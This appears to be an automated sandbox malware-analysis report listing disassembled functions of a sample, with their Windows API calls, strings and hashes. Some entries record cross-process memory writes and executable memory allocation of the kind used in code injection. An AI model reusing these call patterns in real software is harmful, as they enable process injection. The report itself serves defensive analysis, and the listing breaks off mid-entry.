                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                    • CoUninitialize.OLE32 ref: 007DCCFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 12929d651455749f2103e8300a395ac161cb405accea587b9d75a1e4479cf9e0
                                                    • Instruction ID: d48ac8ecf9fb8d54651aadf4277680830323bc6da0a7764edbbc8ee95235434a
                                                    • Opcode Fuzzy Hash: 12929d651455749f2103e8300a395ac161cb405accea587b9d75a1e4479cf9e0
                                                    • Instruction Fuzzy Hash: 88A14A71104205EFD700EF64D885EABB7ECFF94354F00891CF19997292EB74AA09CBA2
                                                    APIs
                                                      • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                      • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 00781680: _memmove.LIBCMT ref: 007816DB
                                                    • __swprintf.LIBCMT ref: 0077E598
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0077E431
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 3fa2093aae5f87531891c54207164c121c4586b5ff4811f9aa3e48f01a9ea2bd
                                                    • Instruction ID: 40cd1d48ae2ca625281419d7a0583d6da62c289d5c1b836bf31ab33c7529d935
                                                    • Opcode Fuzzy Hash: 3fa2093aae5f87531891c54207164c121c4586b5ff4811f9aa3e48f01a9ea2bd
                                                    • Instruction Fuzzy Hash: 4F91CC71108301DFCB14FF24D899D6EB7A8EF89744F40491DF486972A1EA38EE05CB92
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 007952CD
                                                      • Part of subcall function 007A0320: __87except.LIBCMT ref: 007A035B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: aca4168c297b6af11cd52e876542129f7608ff5c901b624b2a9c1eee93d765d5
                                                    • Instruction ID: ffdebdd76f4207e488134fb75fb8f638f7ac6bda2625de3d9f7708d224628484
                                                    • Opcode Fuzzy Hash: aca4168c297b6af11cd52e876542129f7608ff5c901b624b2a9c1eee93d765d5
                                                    • Instruction Fuzzy Hash: 3B518C61E09A01C7CF12B724E95137A3BA0BB87750F304E58E4C1862E5EE7C8CD49BC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: 53431f707e4e743c5af93c9fc8c9168bf8b4e3af0f4940d61751432cde7b9a24
                                                    • Instruction ID: e9d388bd4bae27c0b7b2864b32ca8602c447a7cc74a7fd3c139f19ed60f1f966
                                                    • Opcode Fuzzy Hash: 53431f707e4e743c5af93c9fc8c9168bf8b4e3af0f4940d61751432cde7b9a24
                                                    • Instruction Fuzzy Hash: 43511075500246CFDF15EF68D884AFA7BE4EF55320F14005DE892AB290D738AC82CBA1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_free
                                                    • String ID: #Vx
                                                    • API String ID: 2620147621-2004165239
                                                    • Opcode ID: 00d745daa818616367f17d9b658eac23f5ffc2e1f0c627f641b46ae1ad47117b
                                                    • Instruction ID: 37f500301ea41083e7901a2f80b901224e330880262bec80003f40fb833077d4
                                                    • Opcode Fuzzy Hash: 00d745daa818616367f17d9b658eac23f5ffc2e1f0c627f641b46ae1ad47117b
                                                    • Instruction Fuzzy Hash: 0E5159716087419FDB24CF28C481B6BBBE5BF89354F05896DE98987361E739E801CB92
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: ERCP
                                                    • API String ID: 2532777613-1384759551
                                                    • Opcode ID: 4b9a67a2441beb51d484143927d310a28b787ac90eb3d13e01c6a83abead0beb
                                                    • Instruction ID: 42fb56e5c62adaccd3ca3c04dd9c533377c3a08db1b4b67d7b9bea7357a9d5c2
                                                    • Opcode Fuzzy Hash: 4b9a67a2441beb51d484143927d310a28b787ac90eb3d13e01c6a83abead0beb
                                                    • Instruction Fuzzy Hash: B451D4B1940309DBDB34DF65C885BAABBF8EF04310F14856EE94ADB281E738D985CB50
                                                    APIs
                                                      • Part of subcall function 007D1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9E4E,?,?,00000034,00000800,?,00000034), ref: 007D1CE5
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007CA3F7
                                                      • Part of subcall function 007D1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 007D1CB0
                                                      • Part of subcall function 007D1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 007D1C08
                                                      • Part of subcall function 007D1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C9E12,00000034,?,?,00001004,00000000,00000000), ref: 007D1C18
                                                      • Part of subcall function 007D1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C9E12,00000034,?,?,00001004,00000000,00000000), ref: 007D1C2E
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007CA464
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007CA4B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 199dee96d8d1bd405df6f889e44c5a079805cd121c6fa7aa4f2786b179002c6d
                                                    • Instruction ID: 8f1f16c0b0b24227ae75922174f510a81c5ae0b95b8b47763115278a4b9c06e1
                                                    • Opcode Fuzzy Hash: 199dee96d8d1bd405df6f889e44c5a079805cd121c6fa7aa4f2786b179002c6d
                                                    • Instruction Fuzzy Hash: 4A412B7294021CBFDB14DBA4CD89FDEBBB8AF45300F004199FA55A7280DA756E45CBA1
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007F7A86
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007F7A9A
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F7ABE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: a2a4274df0e3d9348bb86919dc5af231db6a719cd860f0f1c37bfb7b23197bb3
                                                    • Instruction ID: 7f8ef58e1ae858985d48ba11ee2c6257df6cda74602b03b2eaea8800f96715a4
                                                    • Opcode Fuzzy Hash: a2a4274df0e3d9348bb86919dc5af231db6a719cd860f0f1c37bfb7b23197bb3
                                                    • Instruction Fuzzy Hash: 7321803261021DABDF158E54CC86FEE3B69EB48714F124214FF156B290DA75A851DBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007F826F
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007F827D
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007F8284
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 39f85e46cc72f6a406d49e85a64987abb11bf803a5dcdfd51e7792424f18a8c2
                                                    • Instruction ID: 541886a29d7c8f606390f6cbbfee19ff7462537d608af01f45881efd92c8235b
                                                    • Opcode Fuzzy Hash: 39f85e46cc72f6a406d49e85a64987abb11bf803a5dcdfd51e7792424f18a8c2
                                                    • Instruction Fuzzy Hash: 29218BB160420CAFDB50DF58CC85DB737ADFB9A394B080559FA109B351CB35EC11CAA1
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007F7360
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007F7370
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007F7395
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: b1dbf78c3746b217782ad09fb1e071c81ddbf847923b9dfd7639432536d48b00
                                                    • Instruction ID: 453fe0f061146c0e929433b038223514bef37dbd3456ce7fcda13e4557034629
                                                    • Opcode Fuzzy Hash: b1dbf78c3746b217782ad09fb1e071c81ddbf847923b9dfd7639432536d48b00
                                                    • Instruction Fuzzy Hash: 4A21CC32604118BFDF168F54CC85EBF37AAEF89764F118124FA149B290CA75AC51DBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007F7D97
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007F7DAC
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007F7DB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: d52ced662c766d2d06c2cf4fd9fd95f26b7076bbf5998e4e533318b5e22f1975
                                                    • Instruction ID: 51fdc231255e4817c71f642893ce2581042278256d0cf37441170dbcc95e791b
                                                    • Opcode Fuzzy Hash: d52ced662c766d2d06c2cf4fd9fd95f26b7076bbf5998e4e533318b5e22f1975
                                                    • Instruction Fuzzy Hash: B211017220420CBADF249E64CC05FFB3BA9EF88B14F114518FB50A6190D6769811DB20
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00784B44,?,007849D4,?,?,007827AF,?,00000001), ref: 00784B85
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00784B97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: 9b7d6b496cb549bbe992b3e1d0f0cb0f9c1e5ee4c434afe68d0768ff2bbdef38
                                                    • Instruction ID: 0cea723b86fed6c32d78db08ddfec1fb9084667129994cdf1f5a168d77be8704
                                                    • Opcode Fuzzy Hash: 9b7d6b496cb549bbe992b3e1d0f0cb0f9c1e5ee4c434afe68d0768ff2bbdef38
                                                    • Instruction Fuzzy Hash: 28D017B15557238FE721AF76EC18B067AE4BF05351F11882AD496E2690EAB8E880CB50
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00784AF7,?), ref: 00784BB8
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00784BCA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: 7a7e62e3900ee16bef432e75afc1776080e71b9f1de72285bd4a149bd1a7e932
                                                    • Instruction ID: 2fae4dabb900f4658f7fbb9c223e82081e86bcac2dda5aef91ed051fde4746e1
                                                    • Opcode Fuzzy Hash: 7a7e62e3900ee16bef432e75afc1776080e71b9f1de72285bd4a149bd1a7e932
                                                    • Instruction Fuzzy Hash: 0CD017B05547238FEB20AF75EC08B067AE5BF05351F119C6AD496D2A94EAB8D880CB50
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,007F1696), ref: 007F1455
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007F1467
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: 933416adf2e7777c635ec0db6a71a758f49b0751e46e8e782034576b415b0f51
                                                    • Instruction ID: 4818c3445123f9efc58cd8af426533fd17e2c98c7872bd2508393ad0485e0992
                                                    • Opcode Fuzzy Hash: 933416adf2e7777c635ec0db6a71a758f49b0751e46e8e782034576b415b0f51
                                                    • Instruction Fuzzy Hash: F0D01730521722CFE7209F75D80972A76E4FF56395F11C82A94E6D22A0EB78D8C0CB50
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00785E3D), ref: 007855FE
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00785610
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 995963619c0270bb390f736bfa4acab92d1dbf669ef8c9e1951f35d6677c6da2
                                                    • Instruction ID: 8d5b93e7c29d4c800e541c8b0cbc05b168a624ac0367de7f88f4f9d62c7fa1db
                                                    • Opcode Fuzzy Hash: 995963619c0270bb390f736bfa4acab92d1dbf669ef8c9e1951f35d6677c6da2
                                                    • Instruction Fuzzy Hash: 33D01774AA1B12CFE760AF75CC087167AE5BF05755F11882AD496D2291EA78C880CF90
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007E93DE,?,00800980), ref: 007E97D8
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007E97EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 6d17d1718afc4aec347700b4909c47c0abbf243cd7eafc60d841c56a433baedd
                                                    • Instruction ID: d4e06c467068833296e1bc5c39c108e2234382ffdfc6845fc93cd3a57ebe18e6
                                                    • Opcode Fuzzy Hash: 6d17d1718afc4aec347700b4909c47c0abbf243cd7eafc60d841c56a433baedd
                                                    • Instruction Fuzzy Hash: E4D012715117138FD7205F75DC8870676D4FF09391F11882AD895D2250EB78D480CA51
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4286ee316b0787a702c8bbdd6e694dae37b491087a0e77c47a0a410dc5354fcb
                                                    • Instruction ID: 2d392e8aae7c5d4d6d6cb9cc489a65b72b02e31ec950f9be26d9576870e58ee4
                                                    • Opcode Fuzzy Hash: 4286ee316b0787a702c8bbdd6e694dae37b491087a0e77c47a0a410dc5354fcb
                                                    • Instruction Fuzzy Hash: F0C16D75A0021AEFCB18CF98C884EAEB7B5FF48714B11859CE805EB251DB35ED81DB91
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 007EE7A7
                                                    • CharLowerBuffW.USER32(?,?), ref: 007EE7EA
                                                      • Part of subcall function 007EDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007EDEAE
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007EE9EA
                                                    • _memmove.LIBCMT ref: 007EE9FD
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
